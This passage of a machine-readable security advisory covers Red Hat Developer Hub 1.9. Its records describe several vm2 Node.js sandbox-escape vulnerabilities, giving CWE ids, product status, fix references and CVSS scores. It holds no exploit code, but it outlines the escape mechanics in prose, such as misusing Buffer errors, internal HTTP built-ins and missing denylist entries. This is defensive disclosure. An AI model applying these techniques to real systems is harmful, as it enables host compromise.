"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "ws: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray`"
},
{
"cve": "CVE-2026-47131",
"cwe": {
"id": "CWE-843",
"name": "Access of Resource Using Incompatible Type (\u0027Type Confusion\u0027)"
},
"discovery_date": "2026-06-12T15:01:52.744009+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2488393"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in vm2, an open-source virtual machine (VM) sandbox for Node.js. A remote attacker can exploit this vulnerability by combining specific Buffer function calls and Node.js\u0027s ERR_INVALID_ARG_TYPE error. This allows the attacker to obtain the host\u0027s TypeError constructor, leading to an escape from the sandbox. Consequently, this enables attackers to run arbitrary code on the host system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "vm2: vm2: Arbitrary code execution via sandbox escape vulnerability",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The Red Hat Product Security team has rated the impact of this vulnerability as Moderate in Red Hat Developer Hub and Ansible Automation Platform.The affected package is present in both products as a transitive dependency; however, the vulnerable sandbox functionality is not invoked in any production code path. The active sandboxing mechanism used by both products does not rely on this package, and user-supplied input cannot reach the vulnerable code under a standard deployment. Exploitation would require an attacker to independently route arbitrary JavaScript into the sandbox runtime, a condition not present in the default configuration of either product.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-47131"
},
{
"category": "external",
"summary": "RHBZ#2488393",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2488393"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-47131",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-47131"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-47131",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-47131"
},
{
"category": "external",
"summary": "https://github.com/patriksimek/vm2/commit/27c525f4615e2b983f122e2bed327d810126f5c8",
"url": "https://github.com/patriksimek/vm2/commit/27c525f4615e2b983f122e2bed327d810126f5c8"
},
{
"category": "external",
"summary": "https://github.com/patriksimek/vm2/releases/tag/v3.11.4",
"url": "https://github.com/patriksimek/vm2/releases/tag/v3.11.4"
},
{
"category": "external",
"summary": "https://github.com/patriksimek/vm2/security/advisories/GHSA-v6mx-mf47-r5wg",
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-v6mx-mf47-r5wg"
}
],
"release_date": "2026-06-12T14:14:17.037000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-30T15:00:33+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:33574"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "vm2: vm2: Arbitrary code execution via sandbox escape vulnerability"
},
{
"cve": "CVE-2026-47135",
"cwe": {
"id": "CWE-1100",
"name": "Insufficient Isolation of System-Dependent Functions"
},
"discovery_date": "2026-06-12T15:02:02.154869+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2488396"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in vm2, an open-source virtual machine (VM) sandbox for Node.js. An attacker within the sandbox could exploit incomplete symbol interception and missing security checks to gain control over the host system. This could allow the attacker to execute arbitrary code outside the sandbox environment, leading to a complete compromise of the host.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "vm2: vm2: Sandbox escape allows arbitrary code execution on the host system",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability has been rated as Moderate for Red Hat Developer Hub and Red Hat Ansible Automation Platform. The vm2 sandbox exists as a transitive dependency in Red Hat Developer Hub and is only utilized during build time. The sandbox is therefore not exposed on the production code path. Exploitation of this vulnerability requires attackers to write cross-realm symbol keys to host objects which is not possible in the default configuration of Red Hat Developer Hub.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-47135"
},
{
"category": "external",
"summary": "RHBZ#2488396",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2488396"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-47135",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-47135"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-47135",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-47135"
},
{
"category": "external",
"summary": "https://github.com/patriksimek/vm2/commit/928aef51898b5c52a05f05a40c4cfeb52e172878",
"url": "https://github.com/patriksimek/vm2/commit/928aef51898b5c52a05f05a40c4cfeb52e172878"
},
{
"category": "external",
"summary": "https://github.com/patriksimek/vm2/releases/tag/v3.11.4",
"url": "https://github.com/patriksimek/vm2/releases/tag/v3.11.4"
},
{
"category": "external",
"summary": "https://github.com/patriksimek/vm2/security/advisories/GHSA-m5q2-4fm3-vfqp",
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-m5q2-4fm3-vfqp"
}
],
"release_date": "2026-06-12T14:14:42.022000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-30T15:00:33+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:33574"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "vm2: vm2: Sandbox escape allows arbitrary code execution on the host system"
},
{
"cve": "CVE-2026-47137",
"cwe": {
"id": "CWE-480",
"name": "Use of Incorrect Operator"
},
"discovery_date": "2026-06-12T15:01:24.611905+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2488385"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in vm2, an open-source virtual machine (VM) sandbox for Node.js. A remote attacker could bypass a security check designed to prevent the combination of nested environments and disabled module loading. This bypass occurs because a strict equality check for the `require` option can be circumvented by simply omitting the option, leading to an unintended configuration. Successful exploitation of this vulnerability could allow an attacker to escape the sandbox and achieve arbitrary code execution on the host system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "vm2: vm2: Sandbox escape leading to arbitrary code execution via security bypass",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The Red Hat Product Security team has rated the impact of this vulnerability as Moderate in Red Hat Developer Hub and Ansible Automation Platform.The affected package is present in both products as a transitive dependency; however, the vulnerable sandbox functionality is not invoked in any production code path. The active sandboxing mechanism used by both products does not rely on this package, and user-supplied input cannot reach the vulnerable code under a standard deployment. Exploitation would require an attacker to independently route arbitrary JavaScript into the sandbox runtime, a condition not present in the default configuration of either product.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-47137"
},
{
"category": "external",
"summary": "RHBZ#2488385",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2488385"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-47137",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-47137"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-47137",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-47137"
},
{
"category": "external",
"summary": "https://github.com/advisories/GHSA-g644-9gfx-q4q4",
"url": "https://github.com/advisories/GHSA-g644-9gfx-q4q4"
},
{
"category": "external",
"summary": "https://github.com/patriksimek/vm2/commit/01a7552add345d5a6862623884e6b79a85bf0568",
"url": "https://github.com/patriksimek/vm2/commit/01a7552add345d5a6862623884e6b79a85bf0568"
},
{
"category": "external",
"summary": "https://github.com/patriksimek/vm2/commit/86ab819f202c3a8dad88cef5705f2e416c5188d7",
"url": "https://github.com/patriksimek/vm2/commit/86ab819f202c3a8dad88cef5705f2e416c5188d7"
},
{
"category": "external",
"summary": "https://github.com/patriksimek/vm2/releases/tag/v3.11.4",
"url": "https://github.com/patriksimek/vm2/releases/tag/v3.11.4"
},
{
"category": "external",
"summary": "https://github.com/patriksimek/vm2/security/advisories/GHSA-m4wx-m65x-ghrr",
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-m4wx-m65x-ghrr"
}
],
"release_date": "2026-06-12T14:15:34.795000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-30T15:00:33+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:33574"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "vm2: vm2: Sandbox escape leading to arbitrary code execution via security bypass"
},
{
"cve": "CVE-2026-47139",
"cwe": {
"id": "CWE-1100",
"name": "Insufficient Isolation of System-Dependent Functions"
},
"discovery_date": "2026-06-12T15:01:31.104545+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2488387"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in vm2, a Node.js sandbox. This vulnerability allows sandboxed code to bypass network restrictions by utilizing internal HTTP built-ins, such as _http_client and _http_server. An attacker can exploit this to make outbound HTTP requests or open listening HTTP sockets, even when public network modules are explicitly denied. This could lead to unauthorized information disclosure or further compromise of the system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "vm2: vm2: Sandbox escape via internal HTTP built-ins leading to network restriction bypass",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability has been rated as Moderate for Red Hat Developer Hub and Red Hat Ansible Automation Platform. The vm2 sandbox exists as a transitive dependency in Red Hat Developer Hub and is only utilized during build time. The sandbox is therefore not exposed on the production code path. Exploitation of this vulnerability requires attackers to access internal HTTP built-ins which is not possible in the default configuration of Red Hat Developer Hub.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-47139"
},
{
"category": "external",
"summary": "RHBZ#2488387",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2488387"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-47139",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-47139"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-47139",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-47139"
},
{
"category": "external",
"summary": "https://github.com/patriksimek/vm2/commit/436053e30eecbabd487e2fd2959c137ac34e2bb1",
"url": "https://github.com/patriksimek/vm2/commit/436053e30eecbabd487e2fd2959c137ac34e2bb1"
},
{
"category": "external",
"summary": "https://github.com/patriksimek/vm2/releases/tag/v3.11.4",
"url": "https://github.com/patriksimek/vm2/releases/tag/v3.11.4"
},
{
"category": "external",
"summary": "https://github.com/patriksimek/vm2/security/advisories/GHSA-r9pm-gxmw-wv6p",
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-r9pm-gxmw-wv6p"
}
],
"release_date": "2026-06-12T14:15:44.652000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-30T15:00:33+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:33574"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.6,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "vm2: vm2: Sandbox escape via internal HTTP built-ins leading to network restriction bypass"
},
{
"cve": "CVE-2026-47140",
"cwe": {
"id": "CWE-184",
"name": "Incomplete List of Disallowed Inputs"
},
"discovery_date": "2026-06-12T15:01:11.705175+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2488381"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in vm2, an open-source virtual machine (VM) sandbox for Node.js. This vulnerability allows sandboxed code to bypass intended security restrictions by exploiting missing entries in the denylist for dangerous Node.js built-in functions, specifically `process` and `inspector/promises`. A remote attacker can leverage this to execute arbitrary code in the host process, leading to a complete compromise of the system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "vm2: vm2: Arbitrary code execution due to incomplete sandbox restrictions",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The Red Hat Product Security team has rated the impact of this vulnerability as Moderate in Red Hat Developer Hub and Ansible Automation Platform.The affected package is present in both products as a transitive dependency; however, the vulnerable sandbox functionality is not invoked in any production code path. The active sandboxing mechanism used by both products does not rely on this package, and user-supplied input cannot reach the vulnerable code under a standard deployment. Exploitation would require an attacker to independently route arbitrary JavaScript into the sandbox runtime, a condition not present in the default configuration of either product.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-47140"
},
{
"category": "external",
"summary": "RHBZ#2488381",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2488381"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-47140",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-47140"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-47140",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-47140"
},
{
"category": "external",
"summary": "https://github.com/patriksimek/vm2/commit/a1ed47a98d1cc36cb48c0d566d55889688e0b59b",
"url": "https://github.com/patriksimek/vm2/commit/a1ed47a98d1cc36cb48c0d566d55889688e0b59b"
},
{
"category": "external",
"summary": "https://github.com/patriksimek/vm2/releases/tag/v3.11.4",
"url": "https://github.com/patriksimek/vm2/releases/tag/v3.11.4"
},
{
"category": "external",
"summary": "https://github.com/patriksimek/vm2/security/advisories/GHSA-rp36-8xq3-r6c4",
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-rp36-8xq3-r6c4"
}
],
"release_date": "2026-06-12T14:16:10.727000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-30T15:00:33+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:33574"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
